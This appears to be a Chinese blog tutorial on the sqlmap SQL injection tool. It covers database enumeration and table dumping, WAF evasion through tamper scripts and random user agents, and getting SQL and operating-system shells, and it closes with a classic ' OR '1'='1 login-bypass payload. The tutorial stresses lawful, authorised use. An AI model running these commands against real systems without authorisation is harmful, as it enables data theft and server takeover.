首先要守法!!!
首先要守法!!!
首先要守法!!! (重要的事情说三遍)
Sqlmap
一、下载并安装SQLMap,通常可以通过以下命令完成:
git clone --depth 1 https://github.com/sqlmapproject/sqlmap.git sqlmap-dev
二、基本用法是指定目标URL,例如:
python3 sqlmap.py -u "http://example.com/page.php?id=1"
三、选项说明 -u URL:指定目标URL :
python3 sqlmap.py -u "http://example.com/page.php?id=1"
在这个命令中,-u "http://example.com/page.php?id=1" 指定了要测试的目标 URL。SQLMap 将对该 URL 中的参数进行测试,以寻找 SQL 注入漏洞。
.-dbs:列出可用数据库:
python3 sqlmap.py -u "http://example.com/page.php?id=1" --dbs
在这个命令中,--dbs 选项告诉 SQLMap 列出目标数据库服务器上的可用数据库。SQLMap 将尝试获取目标系统上所有可访问的数据库名称。
--tables:列出指定数据库中的表:
python3 sqlmap.py -u "http://example.com/page.php?id=1" -D dbname --tables
在这个命令中,-D dbname 指定了目标数据库的名称,--tables 选项告诉 SQLMap 列出该数据库中的所有表。SQLMap 将尝试获取目标数据库中的所有表名称。
-columns:列出指定表中的列:
python3 sqlmap.py -u "http://example.com/page.php?id=1" -D dbname -T tablename --columns
在这个命令中,-D dbname 指定了目标数据库的名称,-T tablename 指定了目标表的名称,--columns 选项告诉 SQLMap 列出该表中的所有列。SQLMap 将尝试获取目标表中的所有列名称。
-dump:导出指定表中的数据:
python3 sqlmap.py -u "http://example.com/page.php?id=1" -D dbname -T tablename --dump
在这个命令中,-D dbname 指定了目标数据库的名称,-T tablename 指定了目标表的名称,--dump 选项告诉 SQLMap 导出该表中的数据。SQLMap 将尝试获取目标表中的所有数据行并将其输出。
-p PARAMETER:指定参数:
python3 sqlmap.py -u "http://example.com/page.php?id=1" -p id
在这个命令中,-p id 指定了要进行注入测试的参数是 id,这样 SQLMap 将会针对 URL 中的 id 参数执行注入测试。
-os:指定操作系统类型:
python3 sqlmap.py -u "http://example.com/page.php?id=1" --os=linux
在这个命令中,--os=linux 指定了目标 MySQL 数据库所运行的操作系统类型为 Linux。SQLMap 将使用此信息来优化注入测试以适应目标系统环境。
四、Sqlmap脚本使用
-tamper SCRIPT:指定自定义的转换脚本: python3 sqlmap.py -u "http://example.com/page.php?id=1" --tamper=space2plus 在这个命令中,--tamper=space2plus 指定了使用名为 space2plus 的自定义转换脚本。这个脚本的作用是将空格字符转换为加号字符,有时可以绕过一些简单的过滤器。
四、深入选项 --level:指定检测的深度级别(1到5): python3 sqlmap.py -u "http://example.com/page.php?id=1" --level=3 在这个命令中,--level=3 指定了 SQLMap 执行注入测试的深度级别为 3,这意味着测试将以中等深度进行。增加级别会增加测试的复杂性和时间,但也会增加检测到漏洞的可能性。
五、参数使用
--risk:指定检测的风险级别(1到3): python3 sqlmap.py -u "http://example.com/page.php?id=1" --risk=2 在这个命令中,--risk=2 指定了 SQLMap 执行注入测试的风险级别为 2,这意味着测试将以中等风险进行。增加级别会增加测试的复杂性和时间,但也会增加检测到漏洞的可能性。
--batch:批量模式,减少交互式询问: python3 sqlmap.py -u "http://example.com/page.php?id=1" --batch 在这个命令中,--batch 指定了 SQLMap 在批量模式下运行,它将尽可能地自动完成测试过程而不需要用户交互。
--technique:指定使用的注入技术(例如,UNION注入、布尔盲注等): python3 sqlmap.py -u "http://example.com/page.php?id=1" --technique=U 在这个命令中,--technique=U 指定了 SQLMap 使用 UNION 注入技术进行测试。你可以使用不同的技术代码来选择其他技术,例如 B(布尔盲注)、T(时间盲注)等。
六、报告输出 -v VERBOSE:指定详细级别: python3 sqlmap.py -u "http://example.com/page.php?id=1" -v 3 在这个命令中,-v 3 指定了 SQLMap 输出的详细级别为 3,这意味着输出的信息将包含更多的详细信息,包括请求和响应的数据。
--output-dir=DIR:指定报告输出的目录: python3 sqlmap.py -u "http://example.com/page.php?id=1" --output-dir=/path/to/output/directory 在这个命令中,--output-dir=/path/to/output/directory 指定了报告输出的目录为 /path/to/output/directory。SQLMap 将在该目录中生成报告文件。
--flush-session:在导出数据之前刷新会话信息:co python3 sqlmap.py -u "http://example.com/page.php?id=1" --flush-session 在这个命令中,--flush-session 选项告诉 SQLMap 在导出数据之前刷新会话信息。
七、绕过WAF
--tamper=SCRIPT:指定自定义的转换脚本来绕过WAF检测: python3 sqlmap.py -u "http://example.com/page.php?id=1" --tamper=my_custom_tamper.py 在这个命令中,--tamper=my_custom_tamper.py 指定了使用名为 my_custom_tamper.py 的自定义转换脚本。这个脚本中的转换函数将被应用于 SQLMap 发送的请求,以绕过 WAF 的检测。
--random-agent:使用随机的User-Agent来模拟不同的浏览器: python3 sqlmap.py -u "http://example.com/page.php?id=1" --random-agent 在这个命令中,--random-agent 选项告诉 SQLMap 使用随机的 User-Agent 来发送请求。每次请求时,SQLMap 将使用一个随机选择的 User-Agent,模拟不同浏览器或用户代理的行为。
八、漏洞利用 --sql-shell:获取交互式SQLShell: python3 sqlmap.py -u "http://example.com/page.php?id=1" --sql-shell 在这个命令中,--sql-shell 选项告诉 SQLMap 在成功利用 SQL 注入后获取一个交互式的 SQLShell。这样你就可以直接在目标数据库上执行 SQL 查询和命令,进行更深入的探索和操作。
--os-shell:获取交互式操作系统Shell: python3 sqlmap.py -u "http://example.com/page.php?id=1" --os-shell 在这个命令中,--os-shell 选项告诉 SQLMap 在成功利用 SQL 注入后获取一个交互式的操作系统 Shell。这样你就可以直接在目标系统上执行操作系统级别的命令,进行更深入的探索和操作。
--os-cmd:执行操作系统命令: python3 sqlmap.py -u "http://example.com/page.php?id=1" --os-cmd="ls -la" 在这个命令中,--os-cmd="ls -la" 选项告诉 SQLMap 执行 ls -la 命令,列出当前目录下的所有文件和文件夹,并将结果显示在输出中。
九、进阶功能
1.插件系统:SQLMap提供了插件系统,可以通过编写插件来支持新的数据库管理系统或特定的漏洞利用技术。
2.参数化查询:了解目标应用程序中是否使用了参数化查询,以减少SQL注入漏洞的风险。
十、法律和伦理考虑
1.确保在进行安全测试时遵守法律法规和伦理规范。
2.仅在拥有合法授权的环境中使用SQLMap,避免对未经授权的系统进行测试。
#我们永远不要信任用户的输入,我们必须认定用户输入的数据都是不安全的,我们都需要对用户输入的数据进行过滤处理。
假设有一个登录系统,用户通过输入用户名和密码进行身份验证:
SELECT * FROM users WHERE username = 'input_username' AND password = 'input_password';
如果没有正确的输入验证和防范措施,攻击者可以输入类似于以下内容的用户名:
' OR '1'='1'; --
这会使查询返回所有用户,因为 1=1 总是为真,注释符号 -- 用于注释掉原始查询的其余部分,以确保语法正确。
扫一扫
331
被折叠的 条评论
为什么被折叠?
到【灌水乐园】发言
